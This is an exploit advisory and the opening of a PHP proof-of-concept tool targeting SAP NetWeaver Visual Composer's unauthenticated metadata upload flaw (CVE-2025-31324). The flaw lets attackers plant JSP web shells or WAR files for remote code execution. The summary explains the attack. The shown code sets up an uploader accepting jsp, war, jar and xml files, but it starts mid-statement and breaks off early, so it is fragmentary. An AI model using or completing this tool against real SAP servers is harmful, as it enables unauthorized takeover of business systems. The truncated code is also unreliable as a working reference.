============================================================================================================================================= | # Title : SAP NetWeaver 7.50 Visual Composer Metadata Exploitation Tool | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://www.sap.com/ | ============================================================================================================================================= [+] Summary : SAP NetWeaver Visual Composer contains an unauthenticated file upload vulnerability in the metadata uploader component (CVE-2025-31324) that allows attackers to upload arbitrary files including JSP web shells and WAR applications, leading to remote code execution on the SAP server. The vulnerability exists in the metadata uploader component of SAP NetWeaver Visual Composer, which fails to properly authenticate and validate file uploads. Attackers can exploit this by directly uploading malicious files to vulnerable endpoints without any authentication. [+] Usage: http://localhost/poc.php [+] POC : config = [ 'upload_dir' => 'uploads/', 'max_file_size' => 10485760, 'allowed_types' => ['jsp', 'war', 'jar', 'xml'] ]; if (!is_dir($this->config['upload_dir'])) { mkdir($this->config['upload_dir'], 0755, true); } } public function handleRequest() { if ($_SERVER['REQUEST_METHOD'] === 'POST') { $this->handleExploit(); } else { $this->showForm(); } } private function showForm() { echo '